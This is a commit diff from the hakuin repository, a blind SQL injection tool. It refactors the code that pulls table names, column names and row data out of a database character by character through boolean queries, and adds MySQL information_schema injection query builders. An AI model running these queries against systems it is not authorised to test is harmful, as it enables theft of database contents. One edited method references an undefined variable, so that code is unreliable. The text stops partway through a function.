1
0
mirror of https://github.com/pruzko/hakuin synced 2024-10-18 09:48:06 +02:00

major refactoring (DBMS, collectors) & unicode support

This commit is contained in:
Jakub Pruzinec 2023-10-04 19:13:22 +08:00
parent 042fa5df91
commit 9932d8dacd
17 changed files with 1214 additions and 622 deletions

1
.gitignore vendored

@ -163,3 +163,4 @@ cython_debug/
# Hakuin
tmp/
demos/

@ -1,7 +1,6 @@
import hakuin
import hakuin.search_algorithms as search_alg
import hakuin.collectors as collect
from hakuin.utils import CHARSET_SCHEMA
@ -33,24 +32,23 @@ class Extractor:
ctx = search_alg.Context(None, None, None, None)
n_rows = search_alg.IntExponentialSearch(
self.requester,
self.dbms.count_tables,
upper=8
n_rows = search_alg.IntExponentialBinarySearch(
requester=self.requester,
query_cb=self.dbms.TablesQueries.rows_count,
upper=8,
find_range=True,
).run(ctx)
if strategy == 'binary':
return collect.BinaryTextCollector(
self.requester,
self.dbms.char_tables,
charset=CHARSET_SCHEMA,
requester=self.requester,
queries=self.dbms.TablesQueries,
).run(ctx, n_rows)
else:
return collect.ModelTextCollector(
self.requester,
self.dbms.char_tables,
requester=self.requester,
queries=self.dbms.TablesQueries,
model=hakuin.get_model_tables(),
charset=CHARSET_SCHEMA,
).run(ctx, n_rows)
@ -70,24 +68,23 @@ class Extractor:
ctx = search_alg.Context(table, None, None, None)
n_rows = search_alg.IntExponentialSearch(
self.requester,
self.dbms.count_columns,
upper=8
n_rows = search_alg.IntExponentialBinarySearch(
requester=self.requester,
query_cb=self.dbms.ColumnsQueries.rows_count,
upper=8,
find_range=True,
).run(ctx)
if strategy == 'binary':
return collect.BinaryTextCollector(
self.requester,
self.dbms.char_columns,
charset=CHARSET_SCHEMA,
requester=self.requester,
queries=self.dbms.ColumnsQueries,
).run(ctx, n_rows)
else:
return collect.ModelTextCollector(
self.requester,
self.dbms.char_columns,
requester=self.requester,
queries=self.dbms.ColumnsQueries,
model=hakuin.get_model_columns(),
charset=CHARSET_SCHEMA,
).run(ctx, n_rows)
@ -104,15 +101,15 @@ class Extractor:
ctx = search_alg.Context(table, column, None, None)
d_type = search_alg.BinarySearch(
self.requester,
self.dbms.meta_type,
requester=self.requester,
query_cb=self.dbms.MetaQueries.column_data_type,
values=self.dbms.DATA_TYPES,
).run(ctx)
return {
'type': d_type,
'nullable': self.requester.request(ctx, self.dbms.meta_is_nullable(ctx)),
'pk': self.requester.request(ctx, self.dbms.meta_is_pk(ctx)),
'nullable': self.requester.request(ctx, self.dbms.MetaQueries.column_is_nullable(ctx)),
'pk': self.requester.request(ctx, self.dbms.MetaQueries.column_is_pk(ctx)),
}
@ -140,7 +137,7 @@ class Extractor:
return schema
def extract_column(self, table, column, strategy='dynamic', charset=None, n_rows=None, n_rows_guess=128):
def extract_column(self, table, column, strategy='dynamic', charset=None, n_rows_guess=128):
'''Extracts text column.
Params:
@ -152,7 +149,6 @@ class Extractor:
'dynamic' for dynamically choosing the best search strategy and
opportunistically guessing strings
charset (list|None): list of possible characters
n_rows (int|None): number of rows
n_rows_guess (int|None): approximate number of rows when 'n_rows' is not set
Returns:
@ -162,32 +158,30 @@ class Extractor:
assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}'
ctx = search_alg.Context(table, column, None, None)
if n_rows is None:
n_rows = search_alg.IntExponentialSearch(
self.requester,
self.dbms.count_rows,
upper=n_rows_guess
).run(ctx)
n_rows = search_alg.IntExponentialBinarySearch(
requester=self.requester,
query_cb=self.dbms.RowsQueries.rows_count,
upper=n_rows_guess,
find_range=True,
).run(ctx)
if strategy == 'binary':
return collect.BinaryTextCollector(
self.requester,
self.dbms.char_rows,
requester=self.requester,
queries=self.dbms.RowsQueries,
charset=charset,
).run(ctx, n_rows)
elif strategy in ['unigram', 'fivegram']:
ngram = 1 if strategy == 'unigram' else 5
return collect.AdaptiveTextCollector(
self.requester,
self.dbms.char_rows,
requester=self.requester,
queries=self.dbms.RowsQueries,
model=hakuin.Model(ngram),
charset=charset,
).run(ctx, n_rows)
else:
return collect.DynamicTextCollector(
self.requester,
self.dbms.char_rows,
self.dbms.string_rows,
requester=self.requester,
queries=self.dbms.RowsQueries,
charset=charset,
).run(ctx, n_rows)

@ -26,8 +26,9 @@ class Model:
@property
def order(self):
assert self.model
return self.model.order
if self.model:
return self.model.order
return None
def load(self, file):
@ -49,7 +50,7 @@ class Model:
Returns:
dict: likelihood distribution
'''
context = context[-(self.order - 1):]
context = [] if self.order == 1 else context[-(self.order - 1):]
while context:
scores = self._scores(context)

@ -3,284 +3,544 @@ from abc import ABCMeta, abstractmethod
from collections import Counter
import hakuin
from hakuin.utils import tokenize, CHARSET_ASCII, EOS
from hakuin.utils import tokenize, CHARSET_ASCII, EOS, ASCII_MAX, UNICODE_MAX
from hakuin.utils.huffman import make_tree
from hakuin.search_algorithms import Context, BinarySearch, TreeSearch
from hakuin.search_algorithms import Context, BinarySearch, TreeSearch, IntExponentialBinarySearch
class Collector(metaclass=ABCMeta):
'''Abstract class for collectors. Collectors repeatidly run
search algorithms to infer column rows.
search algorithms to extract column rows.
'''
def __init__(self, requester, query_cb):
def __init__(self, requester, queries):
'''Constructor.
Params:
requester (Requester): Requester instance
query_cb (function): query construction function
queries (UniformQueries): injection queries
'''
self.requester = requester
self.query_cb = query_cb
self.queries = queries
def run(self, ctx, n_rows):
'''Run collection.
def run(self, ctx, n_rows, *args, **kwargs):
'''Collects the whole column.
Params:
ctx (Context): inference context
ctx (Context): extraction context
n_rows (int): number of rows in column
Returns:
list: column rows
'''
logging.info(f'Inferring "{ctx.table}.{ctx.column}"...')
logging.info(f'Inferring "{ctx.table}.{ctx.column}"')
data = []
for row in range(n_rows):
ctx = Context(ctx.table, ctx.column, row, None)
res = self._collect_row(ctx)
res = self.collect_row(ctx, *args, **kwargs)
data.append(res)
logging.info(f'({row + 1}/{n_rows}) inferred: {res}')
logging.info(f'({row + 1}/{n_rows}) "{ctx.table}.{ctx.column}": {res}')
return data
@abstractmethod
def _collect_row(self, ctx):
def collect_row(self, ctx, *args, **kwargs):
'''Collects a row.
Params:
ctx (Context): extraction context
Returns:
value: single row
'''
raise NotImplementedError()
class TextCollector(Collector):
'''Collector for text columns.'''
def _collect_row(self, ctx):
def __init__(self, requester, queries, charset=None):
'''Constructor.
Params:
requester (Requester): Requester instance
queries (UniformQueries): injection queries
charset (list|None): list of possible characters, None for default ASCII
'''
super().__init__(requester, queries)
self.charset = charset if charset is not None else CHARSET_ASCII
if EOS not in self.charset:
self.charset.append(EOS)
def run(self, ctx, n_rows):
'''Collects the whole column.
Params:
ctx (Context): extraction context
n_rows (int): number of rows in column
Returns:
list: column rows
'''
rows_are_ascii = self.check_rows_are_ascii(ctx)
return super().run(ctx, n_rows, rows_are_ascii)
def collect_row(self, ctx, rows_are_ascii):
'''Collects a row.
Params:
ctx (Context): extraction context
rows_are_ascii (bool): ASCII flag for all rows in column
Returns:
string: single row
'''
row_is_ascii = True if rows_are_ascii else self.check_row_is_ascii(ctx)
ctx.s = ''
while True:
c = self._collect_char(ctx)
c = self.collect_char(ctx, row_is_ascii)
if c == EOS:
return ctx.s
ctx.s += c
@abstractmethod
def _collect_char(self, ctx):
def collect_char(self, ctx, row_is_ascii):
'''Collects a character.
Params:
ctx (Context): extraction context
row_is_ascii (bool): row ASCII flag
Returns:
string: single character
'''
raise NotImplementedError()
def check_rows_are_ascii(self, ctx):
'''Finds out whether all rows in column are ASCII.
Params:
ctx (Context): extraction context
Returns:
bool: ASCII flag
'''
query = self.queries.rows_are_ascii(ctx)
return self.requester.request(ctx, query)
def check_row_is_ascii(self, ctx):
'''Finds out whether current row is ASCII.
Params:
ctx (Context): extraction context
Returns:
bool: ASCII flag
'''
query = self.queries.row_is_ascii(ctx)
return self.requester.request(ctx, query)
def check_char_is_ascii(self, ctx):
'''Finds out whether current character is ASCII.
Params:
ctx (Context): extraction context
Returns:
bool: ASCII flag
'''
query = self.queries.char_is_ascii(ctx)
return self.requester.request(ctx, query)
class BinaryTextCollector(TextCollector):
'''Binary search text collector'''
def __init__(self, requester, query_cb, charset=None):
'''Constructor.
def collect_char(self, ctx, row_is_ascii):
'''Collects a character.
Params:
requester (Requester): Requester instance
query_cb (function): query construction function
charset (list|None): list of possible characters
ctx (Context): extraction context
row_is_ascii (bool): row ASCII flag
Returns:
list: column rows
string: single character
'''
super().__init__(requester, query_cb)
self.charset = charset if charset else CHARSET_ASCII
return self._collect_or_emulate_char(ctx, row_is_ascii)[0]
def _collect_char(self, ctx):
return BinarySearch(
self.requester,
self.query_cb,
values=self.charset,
).run(ctx)
def emulate_char(self, ctx, row_is_ascii, correct):
'''Emulates character collection without sending requests.
Params:
ctx (Context): extraction context
row_is_ascii (bool): row ASCII flag
correct (str): correct character
Returns:
int: number of requests necessary
'''
return self._collect_or_emulate_char(ctx, row_is_ascii, correct)[1]
def _collect_or_emulate_char(self, ctx, row_is_ascii, correct=None):
total_queries = 0
# custom charset or ASCII
if self.charset is not CHARSET_ASCII or row_is_ascii or self._check_or_emulate_char_is_ascii(ctx, correct):
search_alg = BinarySearch(
requester=self.requester,
query_cb=self.queries.char,
values=self.charset,
correct=correct,
)
res = search_alg.run(ctx)
total_queries += search_alg.n_queries
if res is not None:
return res, total_queries
# Unicode
correct_ord = ord(correct) if correct is not None else correct
search_alg = IntExponentialBinarySearch(
requester=self.requester,
query_cb=self.queries.char_unicode,
lower=ASCII_MAX + 1,
upper=UNICODE_MAX + 1,
find_range=False,
correct=correct_ord,
)
res = search_alg.run(ctx)
total_queries += search_alg.n_queries
return chr(res), total_queries
def _check_or_emulate_char_is_ascii(self, ctx, correct):
if correct is None:
return self.check_char_is_ascii(ctx)
return correct.isascii()
class ModelTextCollector(TextCollector):
'''Language model-based text collector.'''
def __init__(self, requester, query_cb, model, charset=None):
def __init__(self, requester, queries, model, charset=None):
'''Constructor.
Params:
requester (Requester): Requester instance
query_cb (function): query construction function
queries (UniformQueries): injection queries
model (Model): language model
charset (list|None): list of possible characters
Returns:
list: column rows
'''
super().__init__(requester, query_cb)
super().__init__(requester, queries, charset)
self.model = model
self.charset = charset if charset else CHARSET_ASCII
self.binary_collector = BinaryTextCollector(
requester=self.requester,
queries=self.queries,
charset=self.charset,
)
def _collect_char(self, ctx):
def collect_char(self, ctx, row_is_ascii):
'''Collects a character.
Params:
ctx (Context): extraction context
row_is_ascii (bool): row ASCII flag
Returns:
string: single character
'''
return self._collect_or_emulate_char(ctx, row_is_ascii)[0]
def emulate_char(self, ctx, row_is_ascii, correct):
'''Emulates character collection without sending requests.
Params:
ctx (Context): extraction context
row_is_ascii (bool): row ASCII flag
correct (str): correct character
Returns:
int: number of requests necessary
'''
return self._collect_or_emulate_char(ctx, row_is_ascii, correct)[1]
def _collect_or_emulate_char(self, ctx, row_is_ascii, correct=None):
n_queries_model = 0
model_ctx = tokenize(ctx.s, add_eos=False)
scores = self.model.scores(context=model_ctx)
c = TreeSearch(
self.requester,
self.query_cb,
search_alg = TreeSearch(
requester=self.requester,
query_cb=self.queries.char,
tree=make_tree(scores),
).run(ctx)
correct=correct,
)
res = search_alg.run(ctx)
n_queries_model = search_alg.n_queries
if c is not None:
return c
if res is not None:
return res, n_queries_model
charset = list(set(self.charset).difference(set(scores)))
return BinarySearch(
self.requester,
self.query_cb,
values=self.charset,
).run(ctx)
res, n_queries_binary = self.binary_collector._collect_or_emulate_char(ctx, row_is_ascii, correct)
return res, n_queries_model + n_queries_binary
class AdaptiveTextCollector(ModelTextCollector):
'''Same as ModelTextCollector but adapts the model.'''
def _collect_char(self, ctx):
c = super()._collect_char(ctx)
def collect_char(self, ctx):
c = super().collect_char(ctx, correct)
self.model.fit_correct_char(c, partial_str=ctx.s)
return c
class DynamicTextStats:
'''Helper class of DynamicTextCollector to keep track of statistical information.'''
def __init__(self):
self.str_len_mean = 0.0
self.n_strings = 0
self._rpc = {
'binary': {'mean': 0.0, 'hist': []},
'unigram': {'mean': 0.0, 'hist': []},
'fivegram': {'mean': 0.0, 'hist': []},
}
def update_str(self, s):
self.n_strings += 1
self.str_len_mean = (self.str_len_mean * (self.n_strings - 1) + len(s)) / self.n_strings
def update_rpc(self, strategy, n_queries):
rpc = self._rpc[strategy]
rpc['hist'].append(n_queries)
rpc['hist'] = rpc['hist'][-100:]
rpc['mean'] = sum(rpc['hist']) / len(rpc['hist'])
def rpc(self, strategy):
return self._rpc[strategy]['mean']
def best_strategy(self):
return min(self._rpc, key=lambda strategy: self.rpc(strategy))
class DynamicTextCollector(TextCollector):
'''Dynamic text collector. The collector keeps statistical information (RPC)
for several strategies (binary search, unigram, and five-gram) and dynamically
chooses the best one. In addition, it uses the statistical information to
identify when guessing whole strings is likely to succeed and then uses
previously inferred strings to make the guesses.
'''
def __init__(self, requester, queries, charset=None):
'''Constructor.
Attributes:
GUESS_TH (float): success probability threshold necessary to make guesses
GUESS_SCORE_TH (float): minimal necessary probability to be included in guess tree
Params:
requester (Requester): Requester instance
queries (UniformQueries): injection queries
charset (list|None): list of possible characters
Other Attributes:
model_unigram (Model): adaptive unigram model
model_fivegram (Model): adaptive five-gram model
guess_collector (StringGuessCollector): collector for guessing
'''
super().__init__(requester, queries, charset)
self.binary_collector = BinaryTextCollector(
requester=self.requester,
queries=self.queries,
charset=self.charset,
)
self.unigram_collector = ModelTextCollector(
requester=self.requester,
queries=self.queries,
model=hakuin.Model(1),
charset=self.charset,
)
self.fivegram_collector = ModelTextCollector(
requester=self.requester,
queries=self.queries,
model=hakuin.Model(5),
charset=self.charset,
)
self.guess_collector = StringGuessingCollector(
requester=self.requester,
queries=self.queries,
)
self.stats = DynamicTextStats()
def collect_row(self, ctx, rows_are_ascii):
row_is_ascii = True if rows_are_ascii else self.check_row_is_ascii(ctx)
s = self._collect_string(ctx, row_is_ascii)
self.guess_collector.model.fit_single(s, context=[])
self.stats.update_str(s)
return s
def _collect_string(self, ctx, row_is_ascii):
'''Tries to guess strings or extracts them on per-character basis if guessing fails'''
exp_c = self.stats.str_len_mean * self.stats.rpc(self.stats.best_strategy())
correct_str = self.guess_collector.collect_row(ctx, exp_c)
if correct_str is not None:
self._update_stats_str(ctx, row_is_ascii, correct_str)
self.unigram_collector.model.fit_data([correct_str])
self.fivegram_collector.model.fit_data([correct_str])
return correct_str
return self._collect_string_per_char(ctx, row_is_ascii)
def _collect_string_per_char(self, ctx, row_is_ascii):
ctx.s = ''
while True:
c = self.collect_char(ctx, row_is_ascii)
self._update_stats(ctx, row_is_ascii, c)
self.unigram_collector.model.fit_correct_char(c, partial_str=ctx.s)
self.fivegram_collector.model.fit_correct_char(c, partial_str=ctx.s)
if c == EOS:
return ctx.s
ctx.s += c
return ctx.s
def collect_char(self, ctx, row_is_ascii):
'''Chooses the best strategy and uses it to infer a character.'''
best = self.stats.best_strategy()
# print(f'b: {self.stats.rpc("binary")}, u: {self.stats.rpc("unigram")}, f: {self.stats.rpc("fivegram")}')
if best == 'binary':
return self.binary_collector.collect_char(ctx, row_is_ascii)
elif best == 'unigram':
return self.unigram_collector.collect_char(ctx, row_is_ascii)
else:
return self.fivegram_collector.collect_char(ctx, row_is_ascii)
def _update_stats(self, ctx, row_is_ascii, correct):
'''Emulates all strategies without sending requests and updates the statistical information.'''
collectors = (
('binary', self.binary_collector),
('unigram', self.unigram_collector),
('fivegram', self.fivegram_collector),
)
for strategy, collector in collectors:
n_queries = collector.emulate_char(ctx, row_is_ascii, correct)
self.stats.update_rpc(strategy, n_queries)
def _update_stats_str(self, ctx, row_is_ascii, correct_str):
'''Like _update_stats but for whole strings.'''
ctx.s = ''
for c in correct_str:
self._update_stats(ctx, row_is_ascii, c)
ctx.s += c
class StringGuessingCollector(Collector):
'''String guessing collector. The collector keeps track of previously extracted
strings and opportunistically tries to guess new strings.
'''
GUESS_TH = 0.5
GUESS_SCORE_TH = 0.01
def __init__(self, requester, query_char_cb, query_string_cb, charset=None):
def __init__(self, requester, queries):
'''Constructor.
Params:
requester (Requester): Requester instance
query_char_cb (function): query construction function for searching characters
query_string_cb (function): query construction function for searching strings
charset (list|None): list of possible characters
queries (UniformQueries): injection queries
Other Attributes:
model_guess: adaptive string-based model for guessing
model_unigram: adaptive unigram model
model_fivegram: adaptive five-gram model
GUESS_TH (float): minimal threshold necessary to start guessing
GUESS_SCORE_TH (float): minimal threshold for strings to be eligible for guessing
model (Model): adaptive string-based model for guessing
'''
self.requester = requester
self.query_char_cb = query_char_cb
self.query_string_cb = query_string_cb
self.charset = charset if charset else CHARSET_ASCII
self.model_guess = hakuin.Model(1)
self.model_unigram = hakuin.Model(1)
self.model_fivegram = hakuin.Model(5)
self._stats = {
'rpc': {
'binary': {'avg': 0.0, 'hist': []},
'unigram': {'avg': 0.0, 'hist': []},
'fivegram': {'avg': 0.0, 'hist': []},
},
'avg_len': 0.0,
'n_strings': 0,
}
super().__init__(requester, queries)
self.model = hakuin.Model(1)
def _collect_row(self, ctx):
s = self._collect_string(ctx)
self.model_guess.fit_single(s, context=[])
def collect_row(self, ctx, exp_alt=None):
'''Tries to construct a guessing Huffman tree and searches it in case of success.
self._stats['n_strings'] += 1
Params:
ctx (Context): extraction context
exp_alt (float|None): expectation for alternative extraction method or None if it does not exist
total = self._stats['avg_len'] * (self._stats['n_strings'] - 1) + len(s)
self._stats['avg_len'] = total / self._stats['n_strings']
return s
def _collect_string(self, ctx):
'''Identifies if guessings strings is likely to succeed and if yes, it makes guesses.
If guessing does not take place or fails, it proceeds with per-character inference.
Returns:
string|None: guessed string or None if skipped or failed
'''
correct_str = self._try_guessing(ctx)
if correct_str is not None:
self._update_stats_str(ctx, correct_str)
self.model_unigram.fit_data([correct_str])
self.model_fivegram.fit_data([correct_str])
return correct_str
ctx.s = ''
while True:
c = self._collect_char(ctx)
self._update_stats(ctx, c)
self.model_unigram.fit_correct_char(c, partial_str=ctx.s)
self.model_fivegram.fit_correct_char(c, partial_str=ctx.s)
if c == EOS:
return ctx.s
ctx.s += c
def _collect_char(self, ctx):
'''Chooses the best strategy and uses it to infer a character.'''
searched_space = set()
c = self._get_strategy(ctx, searched_space, self._best_strategy()).run(ctx)
if c is None:
c = self._get_strategy(ctx, searched_space, 'binary').run(ctx)
return c
def _try_guessing(self, ctx):
'''Tries to construct a guessing Huffman tree and searches it in case of success.'''
tree = self._get_guess_tree(ctx)
exp_alt = exp_alt if exp_alt is not None else float('inf')
tree = self._get_guess_tree(ctx, exp_alt)
return TreeSearch(
self.requester,
self.query_string_cb,
requester=self.requester,
query_cb=self.queries.string,
tree=tree,
).run(ctx)
def _get_guess_tree(self, ctx):
def _get_guess_tree(self, ctx, exp_alt):
'''Identifies, whether string guessing is likely to succeed and if so,
it constructs a Huffman tree from previously inferred strings.
Params:
ctx (Context): extraction context
exp_alt (float): expectation for alternative extraction method
Returns:
utils.huffman.Node|None: Huffman tree constructed from previously inferred
strings that are likely to succeed or None if no such strings were found
utils.huffman.Node|None: Huffman tree constructed from previously inferred strings that are
likely to succeed or None if no such strings were found
'''
# Expectation for per-character inference:
# exp_c = avg_len * best_strategy_rpc
exp_c = self._stats['avg_len'] * self._stats['rpc'][self._best_strategy()]['avg']
# Iteratively compute the best expectation "best_exp_g" by progressively inserting guess
# strings into a candidate guess set "guesses" and computing their expectation "exp_g".
# The iteration stops when the minimal "exp_g" is found.
# exp(G) = p(s in G) * exp_huff(G) + (1 - p(c in G)) * (exp_huff(G) + exp_c)
# exp(G) = p(s in G) * exp_huff(G) + (1 - p(c in G)) * (exp_huff(G) + exp_alt)
guesses = {}
prob_g = 0.0
best_prob_g = 0.0
best_exp_g = float('inf')
best_tree = None
scores = self.model_guess.scores(context=[])
scores = {k: v for k, v in scores.items() if v >= self.GUESS_SCORE_TH and self.model_guess.count(k, []) > 1}
scores = self.model.scores(context=[])
scores = {k: v for k, v in scores.items() if v >= self.GUESS_SCORE_TH and self.model.count(k, []) > 1}
for guess, score in sorted(scores.items(), key=lambda x: x[1], reverse=True):
guesses[guess] = score
tree = make_tree(guesses)
tree_cost = tree.search_cost()
prob_g += score
exp_g = prob_g * tree_cost + (1 - prob_g) * (tree_cost + exp_c)
exp_g = prob_g * tree_cost + (1 - prob_g) * (tree_cost + exp_alt)
if exp_g > best_exp_g:
break
@ -289,83 +549,7 @@ class DynamicTextCollector(TextCollector):
best_exp_g = exp_g
best_tree = tree
if best_exp_g > exp_c or best_prob_g < self.GUESS_TH:
return None
if best_exp_g <= exp_alt and best_prob_g > self.GUESS_TH:
return best_tree
return best_tree
def _best_strategy(self):
'''Returns the name of the best strategy.'''
return min(self._stats['rpc'], key=lambda strategy: self._stats['rpc'][strategy]['avg'])
def _update_stats(self, ctx, correct):
'''Emulates all strategies without sending any requests and updates the
statistical information.
'''
for strategy in self._stats['rpc']:
searched_space = set()
search_alg = self._get_strategy(ctx, searched_space, strategy, correct)
res = search_alg.run(ctx)
n_queries = search_alg.n_queries
if res is None:
binary_search = self._get_strategy(ctx, searched_space, 'binary', correct)
binary_search.run(ctx)
n_queries += binary_search.n_queries
m = self._stats['rpc'][strategy]
m['hist'].append(n_queries)
m['hist'] = m['hist'][-100:]
m['avg'] = sum(m['hist']) / len(m['hist'])
def _update_stats_str(self, ctx, correct_str):
'''Like _update_stats but for whole strings'''
ctx.s = ''
for c in correct_str:
self._update_stats(ctx, c)
ctx.s += c
def _get_strategy(self, ctx, searched_space, strategy, correct=None):
'''Builds search algorithm configured to search appropriate space.
Params:
ctx (Context): inference context
searched_space (list): list of values that have already been searched
strategy (str): strategy ('binary', 'unigram', 'fivegram')
correct (str|None): correct character
Returns:
SearchAlgorithm: configured search algorithm
'''
if strategy == 'binary':
charset = list(set(self.charset).difference(searched_space))
return BinarySearch(
self.requester,
self.query_char_cb,
values=self.charset,
correct=correct,
)
elif strategy == 'unigram':
scores = self.model_unigram.scores(context=[])
searched_space.union(set(scores))
return TreeSearch(
self.requester,
self.query_char_cb,
tree=make_tree(scores),
correct=correct,
)
else:
model_ctx = tokenize(ctx.s, add_eos=False)
model_ctx = model_ctx[-(self.model_fivegram.order - 1):]
scores = self.model_fivegram.scores(context=model_ctx)
searched_space.union(set(scores))
return TreeSearch(
self.requester,
self.query_char_cb,
tree=make_tree(scores),
correct=correct,
)
return None

@ -3,54 +3,75 @@ from abc import ABCMeta, abstractmethod
class DBMS(metaclass=ABCMeta):
RE_NORM = re.compile(r'[ \n]+')
DATA_TYPES = []
class Queries(metaclass=ABCMeta):
'''Class for constructing SQL queries.'''
_RE_NORMALIZE = re.compile(r'[ \n]+')
@staticmethod
def normalize(s):
return DBMS.RE_NORM.sub(' ', s).strip()
return Queries._RE_NORMALIZE.sub(' ', s).strip()
@staticmethod
def hex(s):
return s.encode("utf-8").hex()
class MetaQueries(Queries):
'''Interface for queries that infer DB metadata.'''
@abstractmethod
def count_rows(self, ctx, n):
raise NotImplementedError()
def column_data_type(self, ctx, values): raise NotImplementedError()
@abstractmethod
def count_tables(self, ctx, n):
raise NotImplementedError()
def column_is_nullable(self, ctx): raise NotImplementedError()
@abstractmethod
def count_columns(self, ctx, n):
raise NotImplementedError()
def column_is_pk(self, ctx): raise NotImplementedError()
@abstractmethod
def meta_type(self, ctx, values):
raise NotImplementedError()
@abstractmethod
def meta_is_nullable(self, ctx):
raise NotImplementedError()
class UniformQueries(Queries):
'''Interface for queries that can be unified.'''
@abstractmethod
def meta_is_pk(self, ctx):
raise NotImplementedError()
def rows_count(self, ctx): raise NotImplementedError()
@abstractmethod
def rows_are_ascii(self, ctx): raise NotImplementedError()
@abstractmethod
def row_is_ascii(self, ctx): raise NotImplementedError()
@abstractmethod
def char_is_ascii(self, ctx): raise NotImplementedError()
@abstractmethod
def char(self, ctx): raise NotImplementedError()
@abstractmethod
def char_unicode(self, ctx): raise NotImplementedError()
@abstractmethod
def string(self, ctx, values): raise NotImplementedError()
@abstractmethod
def char_rows(self, ctx, values):
raise NotImplementedError()
@abstractmethod
def char_tables(self, ctx, values):
raise NotImplementedError()
@abstractmethod
def char_columns(self, ctx, values):
raise NotImplementedError()
class DBMS(metaclass=ABCMeta):
'''Database Management System (DBMS) interface.
@abstractmethod
def string_rows(self, ctx, values):
raise NotImplementedError()
Attributes:
DATA_TYPES (list): all data types available
MetaQueries (MetaQueries): queries of metadata extraction
TablesQueries (UniformQueries): queries for table names extraction
ColumnsQueries (UniformQueries): queries for column names extraction
RowsQueries (UniformQueries): queries for rows extraction
'''
_RE_ESCAPE = re.compile(r'[a-zA-Z0-9_#@]+')
DATA_TYPES = []
MetaQueries = None
TablesQueries = None
ColumnsQueries = None
RowsQueries = None
@staticmethod
def escape(s):
if DBMS._RE_ESCAPE.match(s):
return s
assert ']' not in s, f'Cannot escape "{s}"'
return f'[{s}]'

@ -1,9 +1,298 @@
from hakuin.utils import EOS
from hakuin.utils import EOS, ASCII_MAX
from .DBMS import DBMS
from .DBMS import DBMS, MetaQueries, UniformQueries
class MySQLMetaQueries(MetaQueries):
def column_data_type(self, ctx, values):
values = [f"'{v}'" for v in values]
query = f'''
SELECT lower(DATA_TYPE) in ({','.join(values)})
FROM information_schema.columns
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}' AND
COLUMN_NAME=x'{self.hex(ctx.column)}'
'''
return self.normalize(query)
def column_is_nullable(self, ctx):
query = f'''
SELECT IS_NULLABLE='YES'
FROM information_schema.columns
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}' AND
COLUMN_NAME=x'{self.hex(ctx.column)}'
'''
return self.normalize(query)
def column_is_pk(self, ctx):
query = f'''
SELECT COLUMN_KEY='PRI'
FROM information_schema.columns
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}' AND
COLUMN_NAME=x'{self.hex(ctx.column)}'
'''
return self.normalize(query)
class MySQLTablesQueries(UniformQueries):
def rows_count(self, ctx, n):
query = f'''
SELECT count(*) < {n}
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=database()
'''
return self.normalize(query)
def rows_are_ascii(self, ctx):
# min() simulates the logical ALL operator here
query = f'''
SELECT min(TABLE_NAME = CONVERT(TABLE_NAME using ASCII))
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=database()
'''
return self.normalize(query)
def row_is_ascii(self, ctx):
query = f'''
SELECT TABLE_NAME = CONVERT(TABLE_NAME using ASCII)
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=database()
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_is_ascii(self, ctx):
query = f'''
SELECT ord(convert(substr(TABLE_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {ASCII_MAX + 1}
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=database()
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('utf-8').hex()
if has_eos:
query = f'''
SELECT locate(substr(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=database()
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT char_length(TABLE_NAME) != {len(ctx.s)} AND
locate(substr(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=database()
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_unicode(self, ctx, n):
query = f'''
SELECT ord(convert(substr(TABLE_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {n}
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=database()
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string(self, ctx):
raise NotImplementedError('TODO?')
class MySQLColumnsQueries(UniformQueries):
def rows_count(self, ctx, n):
query = f'''
SELECT count(*) < {n}
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}'
'''
return self.normalize(query)
def rows_are_ascii(self, ctx):
query = f'''
SELECT min(COLUMN_NAME = CONVERT(COLUMN_NAME using ASCII))
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}'
'''
return self.normalize(query)
def row_is_ascii(self, ctx):
query = f'''
SELECT min(COLUMN_NAME = CONVERT(COLUMN_NAME using ASCII))
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_is_ascii(self, ctx):
query = f'''
SELECT ord(convert(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {ASCII_MAX + 1}
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('utf-8').hex()
if has_eos:
query = f'''
SELECT locate(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}'
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT char_length(COLUMN_NAME) != {len(ctx.s)} AND
locate(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_unicode(self, ctx, n):
query = f'''
